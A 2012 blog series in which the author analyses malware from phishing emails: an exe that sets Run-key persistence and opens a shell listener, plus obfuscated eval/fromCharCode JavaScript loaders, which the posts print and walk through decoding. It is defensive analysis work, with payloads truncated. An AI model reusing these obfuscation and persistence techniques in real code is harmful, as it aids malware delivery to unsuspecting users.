Irregular Expressions


July 28, 2012  12:24 AM

Discount Gift Certificates – Part 4

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

I did a dump of the exe, and the good news is that I don’t see any sign of a packer. The bad news is that I don’t see any sign of it’s ability to phone home. I was really hoping that this would be easy and a dns name or ip would be found in the exe.

Next thing is to run through it in a debugger and see if there is anything else of note.

July 27, 2012  12:21 AM

Discount Gift Certificates – Part 3

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

Still no sign of out bound connections, and I am not sure if I will ever see on at this point.
My next step is to do some static analysis of the code and see if there is any hints in there.

I did have a thought, the suspect file came attached to an HTML email?
That could be an effective way to see who possible loaded the exe, if you linked to a file on a web server from inside the html you could see it hit in the logs. Then scan those IP’s at a later date.

After much searching, all of the links in the file are going to groupon.com.
I was starting to get disappointed when I noticed some extra’s on some of the links…

There is division, user, source. This might be something to work with, but I doubt it will get anything more then an email to groupon to ask about it.
Each of the links appears to have a different user string attached like so.

user=3DDYS6OKLRAMKYYLDPUVAYRXSE3NMMNR3ETX39NA6LFNF8G
user=3DOBPAXTL39667KKV9YNBX7U6K00
user=3DXKHPO5YGT7OX9O42NUL1YK1CB9E

But the source and division seem to be consistent.
utm_source=3Dwelcome_day0&amp=;utm_medium=3Demail
division=3Dmiami

If what I am thinking is correct the attacker is using groupon to manage the campaign, by using it’s methods of tracking. I am assuming that what ever they can see through the analytics allows them to see the IP of the source.

I will send an email to them, see if we get anywhere.

Also we can continue with the static analysis.


July 26, 2012  11:24 PM

Discount Gift Certificates – Part 2

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

Still no outbound connections that I have seen so far, but I did a bit of looking around and it does create a listener.

Listening on port 8000 TCP.

Connecting to it with netcat gives to a command shell.

That’s good to know, what I really want to know is how they are going to connect to that and know where it is.


July 26, 2012  10:59 PM

Discount Gift Certificates

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

Wow really I can’t wait to get those.

I got a fake groupon email today with a zip attachment that had a an exe inside.

First thing was to get it copied on to my VM system ( and hope it does not do something silly while running in a VM ).
Then get a few of my favorite utils fired up. For this I am going to just start with CaptureBAT and see what happens then go from there.

We are off to a good start, it did run. It went off as a running process of the same name. Here is some other things it did;
- Dropped a file to “Documents and Settings\All Users\svchost.exe”
- Created a persistent method of launching, HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SunJavaUpdateSched: “C:\Documents and Settings\All Users\svchost.exe”

What I have not seen yet is it make a network connection out.
Yet anyway.


July 25, 2012  7:26 PM

Side Quest — Part 4

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

I am still working on getting the shellcode out so I can play with it, but in the mean time I hashed the file.

https://www.virustotal.com/file/51d0586cd16f1339674610b5e2d0eec810f647a40731ae551ad426699f333866/analysis/

We are on the right track, I might have to back burner this one for a bit.


July 24, 2012  7:35 PM

Side Quest — Part 4

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

The js we got from the last part has a lot of functions that appear to be checking versions of various software, but there is a bit of gravy at the end.


function getShellCode() {
if (1) {
return "shellcode";
}
}

I truncated the shellcode, next we need to get that out of there and figure out what it does.
I am not sure at this point if this is a link to more js or shellcode itself, either way it will be fun.


July 21, 2012  1:28 AM

Side Quest — Part 3

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

If you are following at home you should have a comma delimited dataset from that last part of the script we ran.

It should be around 110k so it is much bigger then the last two.

This will be a little more complicated then the last few steps as well, here is the first for loop.


z=function(){if(window.document)e="ev";c="";if(x)f="fromChar";
d=10;
m=Math;
for(i=32606-1;i>=0;i--){
w=i;
v=a[w];
dd=(32606-i-2+1);
b=d;
dd=dd-b*m["floo"+"r"](dd/d);
k=v*1+(dd-3);
if(x&&e)c=c+String.fromCharCode(k);
}
e+="a";
md=["a"];
window[e+"l"](c);}

At the end there was a second, this one was much less complicated.

a=[];
for(i=0;i<g.length;i+=2){
a.push(parseInt(g.substr(i,2),16));
}
z(123);

For me running this to rhino produced errors and I fixed a few and then it made some more. I quickly abandoned it and created my own. Instead of re-writing the whole thing, I got the second for loop to run with no changes (its the second for loop but it’s ran first). The second loop filled the variable “a”, which is not really useful to me at this point. You can either use a debugger or do what I did and add a statement to eval the contents of “a” (we pointed eval to print when we started).

The output from this is a huge decimal comma delimited file.

Now we need to solve the second for loop. Below is my version of the for loop, but in perl. Just get the contents of “a” in to the @data array.


foreach (@data) {
chomp($_);
@a = split(',',$_);

for ($i=32606-1;$i>=0;$i--) {

$v = $a[$i];
$dd = (32606-$i-2+1);
$d=10;
$b=$d;
$dd=$dd-$b*floor($dd/$d);
$k = $v*1+($dd-3);

$string = chr($k);
print "$string";
}

}

This should give you yet more js.


July 21, 2012  1:14 AM

Side Quest — Part 2

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

The best way to decode the contents of “n” is to let the script do it for us.

The script already has everything we need to do it, so running something like rhino on the command line should give you everything you need.  Be sure to read the man pages and documentation before you go in to this one, also it will help to have a basic understanding of the script itself.

After running this through we get a more js back, part of it is a iframe that is loaded and it links to another site.

hxxp://xxxxxxxxx.xx.xx/main.php?page=xxxxxxx

After downloading this page, we get a big surprise..

More js.

Here is the summary.


// =0;i--){
w=i;
v=a[w];
dd=(32606-i-2+1);
b=d;
dd=dd-b*m["floo"+"r"](dd/d);
k=v*1+(dd-3);
if(x&&e)c=c+String.fromCharCode(k);
}
e+="a";
md=["a"];
window[e+"l"](c);}
try{5<=prototype;}catch(v){x=1;}

g=”39……”;

a=[];
for(i=0;i<g.length;i+=2){
a.push(parseInt(g.substr(i,2),16));
}
z(123);

Just a little more complicated then the last one, but not much.  Pointing this strait at rhino generated errors so I broke it in to two sets.

The first is populating “a”,  instead of pushing the output of the the last for loop to a you can print it to the screen and redirect to a file.

 


July 20, 2012  12:43 AM

Side tracked…

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

I got a funny email today that I started digging in to, so I thought I would share as I have been working on little else since.

It came in as a notice from facebook that someone has posted a picture of me..

Yay! That so exciting, it was caught by the spam filter so it means it must be a really good picture..

There was a few links embedded in to the email but they all when to the same place.

Here is what it was trying to execute.

<script>
try{prototype>
0;
} catch(zxc){e=window["eva"+"l"];
n="89..1125..81..21".split("..");
h=2;
s="";
for(i=0;-623+i<0;i=1+i){
k=i;
s=s+String.fromCharCode(n[k]/(i%(h)+9));
}
if(012===10)e(s);
}</script>

Pardon the terrible parsing job I did and the var n has been cut way down to keep it simple.

The basics of what is going here is that there is something hidden in n (duh) and the surrounding code gets it out and executes it.  The key functions we need to know here are, split and fromCharCode.

Split does exactly what it sounds like it will split the text with a given parser in this case .. so it produces a string free of them.  These are just added as an attempt to hider analysis and detection.

fromCharCode will convert a unicode value in to an ascii character.

Part 2 is going to show what tools to use to get something out of this with minimal effort.


July 17, 2012  10:30 PM

The Return Of Zeus

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

I am finally ready to continue my analysis of the zeus sample I have.  I am just getting a couple of machines ready to continue.

From this point in I want to continue the behavioral analysis with Capture-BAT on the client and some other honeynet projects on a Linux machine to emulate services.

Capture-Bat can be found here, https://www.honeynet.org/node/315 .

For Linux I will be using REMnux, which you can get here http://sourceforge.net/projects/remnux/files/version3/remnux-3.0-vm-public.rar/download .

I will be using REMnux to emulate and capture all of the network traffic.  Just got to get this all setup again.


Forgot Password

No problem! Submit your e-mail address below. We'll send you an e-mail containing your password.

Your password has been sent to: